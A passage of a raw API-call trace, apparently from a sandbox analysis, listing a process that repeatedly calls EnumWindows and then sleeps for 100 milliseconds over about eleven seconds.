lParam=0x410000) [0256.719] Sleep (dwMilliseconds=0x64) [0256.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.741] Sleep (dwMilliseconds=0x64) [0256.779] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.781] Sleep (dwMilliseconds=0x64) [0256.806] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.807] Sleep (dwMilliseconds=0x64) [0256.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.858] Sleep (dwMilliseconds=0x64) [0256.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.885] Sleep (dwMilliseconds=0x64) [0256.898] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.900] Sleep (dwMilliseconds=0x64) [0256.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.942] Sleep (dwMilliseconds=0x64) [0256.971] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.973] Sleep (dwMilliseconds=0x64) [0256.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.984] Sleep (dwMilliseconds=0x64) [0257.047] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.048] Sleep (dwMilliseconds=0x64) [0257.079] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.080] Sleep (dwMilliseconds=0x64) [0257.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.088] Sleep (dwMilliseconds=0x64) [0257.124] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.126] Sleep (dwMilliseconds=0x64) [0257.166] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.168] Sleep (dwMilliseconds=0x64) [0257.169] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.170] Sleep (dwMilliseconds=0x64) [0257.218] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.220] Sleep (dwMilliseconds=0x64) [0257.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.261] Sleep (dwMilliseconds=0x64) [0257.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.273] Sleep (dwMilliseconds=0x64) [0257.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.303] Sleep (dwMilliseconds=0x64) [0257.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.349] Sleep (dwMilliseconds=0x64) [0257.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.365] Sleep (dwMilliseconds=0x64) [0257.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.392] Sleep (dwMilliseconds=0x64) [0257.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.430] Sleep (dwMilliseconds=0x64) [0257.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.459] Sleep (dwMilliseconds=0x64) [0257.472] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.473] Sleep (dwMilliseconds=0x64) [0257.515] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.516] Sleep (dwMilliseconds=0x64) [0257.550] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.552] Sleep (dwMilliseconds=0x64) [0257.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.561] Sleep (dwMilliseconds=0x64) [0257.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.599] Sleep (dwMilliseconds=0x64) [0257.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.638] Sleep (dwMilliseconds=0x64) [0257.641] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.642] Sleep (dwMilliseconds=0x64) [0257.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.681] Sleep (dwMilliseconds=0x64) [0257.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.715] Sleep (dwMilliseconds=0x64) [0257.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.721] Sleep (dwMilliseconds=0x64) [0257.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.761] Sleep (dwMilliseconds=0x64) [0257.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.795] Sleep (dwMilliseconds=0x64) [0257.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.802] Sleep (dwMilliseconds=0x64) [0257.842] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.843] Sleep (dwMilliseconds=0x64) [0257.884] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.885] Sleep (dwMilliseconds=0x64) [0257.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.896] Sleep (dwMilliseconds=0x64) [0257.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.942] Sleep (dwMilliseconds=0x64) [0257.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0257.982] Sleep (dwMilliseconds=0x64) [0258.009] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.010] Sleep (dwMilliseconds=0x64) [0258.047] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.048] Sleep (dwMilliseconds=0x64) [0258.073] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.096] Sleep (dwMilliseconds=0x64) [0258.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.134] Sleep (dwMilliseconds=0x64) [0258.149] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.150] Sleep (dwMilliseconds=0x64) [0258.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.173] Sleep (dwMilliseconds=0x64) [0258.219] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.220] Sleep (dwMilliseconds=0x64) [0258.228] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.229] Sleep (dwMilliseconds=0x64) [0258.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.264] Sleep (dwMilliseconds=0x64) [0258.300] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.301] Sleep (dwMilliseconds=0x64) [0258.337] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.338] Sleep (dwMilliseconds=0x64) [0258.375] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.380] Sleep (dwMilliseconds=0x64) [0258.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.418] Sleep (dwMilliseconds=0x64) [0258.422] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.423] Sleep (dwMilliseconds=0x64) [0258.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.463] Sleep (dwMilliseconds=0x64) [0258.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.501] Sleep (dwMilliseconds=0x64) [0258.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.543] Sleep (dwMilliseconds=0x64) [0258.581] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.582] Sleep (dwMilliseconds=0x64) [0258.586] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.587] Sleep (dwMilliseconds=0x64) [0258.622] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.624] Sleep (dwMilliseconds=0x64) [0258.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.669] Sleep (dwMilliseconds=0x64) [0258.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.680] Sleep (dwMilliseconds=0x64) [0258.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.712] Sleep (dwMilliseconds=0x64) [0258.751] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.752] Sleep (dwMilliseconds=0x64) [0258.764] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.794] Sleep (dwMilliseconds=0x64) [0258.830] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.831] Sleep (dwMilliseconds=0x64) [0258.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.848] Sleep (dwMilliseconds=0x64) [0258.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.871] Sleep (dwMilliseconds=0x64) [0258.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0258.984] Sleep (dwMilliseconds=0x64) [0259.018] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0259.018] Sleep (dwMilliseconds=0x64) [0262.155] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.156] Sleep (dwMilliseconds=0x64) [0262.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.232] Sleep (dwMilliseconds=0x64) [0262.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.287] Sleep (dwMilliseconds=0x64) [0262.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.303] Sleep (dwMilliseconds=0x64) [0262.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.329] Sleep (dwMilliseconds=0x64) [0262.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.368] Sleep (dwMilliseconds=0x64) [0262.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.399] Sleep (dwMilliseconds=0x64) [0262.440] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.441] Sleep (dwMilliseconds=0x64) [0262.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.506] Sleep (dwMilliseconds=0x64) [0262.539] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.541] Sleep (dwMilliseconds=0x64) [0262.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.553] Sleep (dwMilliseconds=0x64) [0262.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.593] Sleep (dwMilliseconds=0x64) [0262.635] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.636] Sleep (dwMilliseconds=0x64) [0262.654] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.691] Sleep (dwMilliseconds=0x64) [0262.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.733] Sleep (dwMilliseconds=0x64) [0262.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.769] Sleep (dwMilliseconds=0x64) [0262.800] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.802] Sleep (dwMilliseconds=0x64) [0262.838] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.840] Sleep (dwMilliseconds=0x64) [0262.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.897] Sleep (dwMilliseconds=0x64) [0262.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.931] Sleep (dwMilliseconds=0x64) [0262.998] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0262.999] Sleep (dwMilliseconds=0x64) [0263.056] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.057] Sleep (dwMilliseconds=0x64) [0263.059] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.060] Sleep (dwMilliseconds=0x64) [0263.097] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.098] Sleep (dwMilliseconds=0x64) [0263.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.134] Sleep (dwMilliseconds=0x64) [0263.137] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.138] Sleep (dwMilliseconds=0x64) [0263.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.178] Sleep (dwMilliseconds=0x64) [0263.224] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.226] Sleep (dwMilliseconds=0x64) [0263.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.236] Sleep (dwMilliseconds=0x64) [0263.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.271] Sleep (dwMilliseconds=0x64) [0263.305] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.307] Sleep (dwMilliseconds=0x64) [0263.311] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.313] Sleep (dwMilliseconds=0x64) [0263.353] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.354] Sleep (dwMilliseconds=0x64) [0263.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.399] Sleep (dwMilliseconds=0x64) [0263.408] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.409] Sleep (dwMilliseconds=0x64) [0263.446] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.447] Sleep (dwMilliseconds=0x64) [0263.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.486] Sleep (dwMilliseconds=0x64) [0263.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.497] Sleep (dwMilliseconds=0x64) [0263.525] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.527] Sleep (dwMilliseconds=0x64) [0263.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.565] Sleep (dwMilliseconds=0x64) [0263.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.586] Sleep (dwMilliseconds=0x64) [0263.606] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.608] Sleep (dwMilliseconds=0x64) [0263.646] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.647] Sleep (dwMilliseconds=0x64) [0263.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.674] Sleep (dwMilliseconds=0x64) [0263.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.691] Sleep (dwMilliseconds=0x64) [0263.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.730] Sleep (dwMilliseconds=0x64) [0263.768] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.769] Sleep (dwMilliseconds=0x64) [0263.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.773] Sleep (dwMilliseconds=0x64) [0263.810] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.812] Sleep (dwMilliseconds=0x64) [0263.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.850] Sleep (dwMilliseconds=0x64) [0263.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.860] Sleep (dwMilliseconds=0x64) [0263.888] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.889] Sleep (dwMilliseconds=0x64) [0263.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.928] Sleep (dwMilliseconds=0x64) [0263.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0263.967] Sleep (dwMilliseconds=0x64) [0264.024] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.026] Sleep (dwMilliseconds=0x64) [0264.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.031] Sleep (dwMilliseconds=0x64) [0264.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.066] Sleep (dwMilliseconds=0x64) [0264.096] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.097] Sleep (dwMilliseconds=0x64) [0264.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.104] Sleep (dwMilliseconds=0x64) [0264.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.145] Sleep (dwMilliseconds=0x64) [0264.180] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.204] Sleep (dwMilliseconds=0x64) [0264.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.211] Sleep (dwMilliseconds=0x64) [0264.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.250] Sleep (dwMilliseconds=0x64) [0264.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.286] Sleep (dwMilliseconds=0x64) [0264.290] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.291] Sleep (dwMilliseconds=0x64) [0264.333] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.335] Sleep (dwMilliseconds=0x64) [0264.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.373] Sleep (dwMilliseconds=0x64) [0264.376] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.376] Sleep (dwMilliseconds=0x64) [0264.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.484] Sleep (dwMilliseconds=0x64) [0264.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.523] Sleep (dwMilliseconds=0x64) [0264.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.527] Sleep (dwMilliseconds=0x64) [0264.562] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.565] Sleep (dwMilliseconds=0x64) [0264.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.592] Sleep (dwMilliseconds=0x64) [0264.602] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.603] Sleep (dwMilliseconds=0x64) [0264.639] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.641] Sleep (dwMilliseconds=0x64) [0264.658] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.659] Sleep (dwMilliseconds=0x64) [0264.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.681] Sleep (dwMilliseconds=0x64) [0264.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.723] Sleep (dwMilliseconds=0x64) [0264.752] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.753] Sleep (dwMilliseconds=0x64) [0264.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.788] Sleep (dwMilliseconds=0x64) [0264.792] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.793] Sleep (dwMilliseconds=0x64) [0264.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.830] Sleep (dwMilliseconds=0x64) [0264.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.860] Sleep (dwMilliseconds=0x64) [0264.871] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.872] Sleep (dwMilliseconds=0x64) [0264.907] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.908] Sleep (dwMilliseconds=0x64) [0264.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.924] Sleep (dwMilliseconds=0x64) [0264.945] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.946] Sleep (dwMilliseconds=0x64) [0264.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0264.981] Sleep (dwMilliseconds=0x64) [0264.987] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.002] Sleep (dwMilliseconds=0x64) [0265.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.047] Sleep (dwMilliseconds=0x64) [0265.086] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.087] Sleep (dwMilliseconds=0x64) [0265.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.090] Sleep (dwMilliseconds=0x64) [0265.123] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.125] Sleep (dwMilliseconds=0x64) [0265.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.165] Sleep (dwMilliseconds=0x64) [0265.166] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.167] Sleep (dwMilliseconds=0x64) [0265.202] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.204] Sleep (dwMilliseconds=0x64) [0265.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.318] Sleep (dwMilliseconds=0x64) [0265.362] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.364] Sleep (dwMilliseconds=0x64) [0265.430] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.432] Sleep (dwMilliseconds=0x64) [0265.496] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.517] Sleep (dwMilliseconds=0x64) [0265.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.540] Sleep (dwMilliseconds=0x64) [0265.578] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.580] Sleep (dwMilliseconds=0x64) [0265.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.608] Sleep (dwMilliseconds=0x64) [0265.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.633] Sleep (dwMilliseconds=0x64) [0265.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.674] Sleep (dwMilliseconds=0x64) [0265.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.714] Sleep (dwMilliseconds=0x64) [0265.716] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.717] Sleep (dwMilliseconds=0x64) [0265.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.754] Sleep (dwMilliseconds=0x64) [0265.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.785] Sleep (dwMilliseconds=0x64) [0265.793] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.794] Sleep (dwMilliseconds=0x64) [0265.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.831] Sleep (dwMilliseconds=0x64) [0265.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.856] Sleep (dwMilliseconds=0x64) [0265.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.871] Sleep (dwMilliseconds=0x64) [0265.906] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.908] Sleep (dwMilliseconds=0x64) [0265.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.942] Sleep (dwMilliseconds=0x64) [0265.947] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.948] Sleep (dwMilliseconds=0x64) [0265.984] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0265.986] Sleep (dwMilliseconds=0x64) [0266.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.064] Sleep (dwMilliseconds=0x64) [0266.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.069] Sleep (dwMilliseconds=0x64) [0266.111] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.112] Sleep (dwMilliseconds=0x64) [0266.174] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.187] Sleep (dwMilliseconds=0x64) [0266.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.219] Sleep (dwMilliseconds=0x64) [0266.282] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.284] Sleep (dwMilliseconds=0x64) [0266.300] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.301] Sleep (dwMilliseconds=0x64) [0266.328] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.330] Sleep (dwMilliseconds=0x64) [0266.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.367] Sleep (dwMilliseconds=0x64) [0266.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.371] Sleep (dwMilliseconds=0x64) [0266.408] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.409] Sleep (dwMilliseconds=0x64) [0266.448] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.449] Sleep (dwMilliseconds=0x64) [0266.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.456] Sleep (dwMilliseconds=0x64) [0266.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.491] Sleep (dwMilliseconds=0x64) [0266.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.529] Sleep (dwMilliseconds=0x64) [0266.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.543] Sleep (dwMilliseconds=0x64) [0266.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.571] Sleep (dwMilliseconds=0x64) [0266.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.608] Sleep (dwMilliseconds=0x64) [0266.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.631] Sleep (dwMilliseconds=0x64) [0266.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.650] Sleep (dwMilliseconds=0x64) [0266.685] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.687] Sleep (dwMilliseconds=0x64) [0266.716] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.717] Sleep (dwMilliseconds=0x64) [0266.725] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.727] Sleep (dwMilliseconds=0x64) [0266.764] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.766] Sleep (dwMilliseconds=0x64) [0266.803] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.808] Sleep (dwMilliseconds=0x64) [0266.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.922] Sleep (dwMilliseconds=0x64) [0266.965] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.966] Sleep (dwMilliseconds=0x64) [0266.971] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0266.972] Sleep (dwMilliseconds=0x64) [0267.048] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.053] Sleep (dwMilliseconds=0x64) [0267.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.095] Sleep (dwMilliseconds=0x64) [0267.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.099] Sleep (dwMilliseconds=0x64) [0267.134] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.135] Sleep (dwMilliseconds=0x64) [0267.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.179] Sleep (dwMilliseconds=0x64) [0267.211] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.213] Sleep (dwMilliseconds=0x64) [0267.244] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.245] Sleep (dwMilliseconds=0x64) [0267.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.291] Sleep (dwMilliseconds=0x64) [0267.300] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.301] Sleep (dwMilliseconds=0x64) [0267.329] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.331] Sleep (dwMilliseconds=0x64) [0267.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.371] Sleep (dwMilliseconds=0x64) [0267.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.382] Sleep (dwMilliseconds=0x64) [0267.412] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.413] Sleep (dwMilliseconds=0x64) [0267.449] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.450] Sleep (dwMilliseconds=0x64) [0267.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.456] Sleep (dwMilliseconds=0x64) [0267.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.490] Sleep (dwMilliseconds=0x64) [0267.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.525] Sleep (dwMilliseconds=0x64) [0267.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.565] Sleep (dwMilliseconds=0x64) [0267.604] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.605] Sleep (dwMilliseconds=0x64) [0267.622] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.624] Sleep (dwMilliseconds=0x64) [0267.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.654] Sleep (dwMilliseconds=0x64) [0267.688] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.690] Sleep (dwMilliseconds=0x64) [0267.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.694] Sleep (dwMilliseconds=0x64) [0267.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.732] Sleep (dwMilliseconds=0x64) [0267.767] EnumWindows 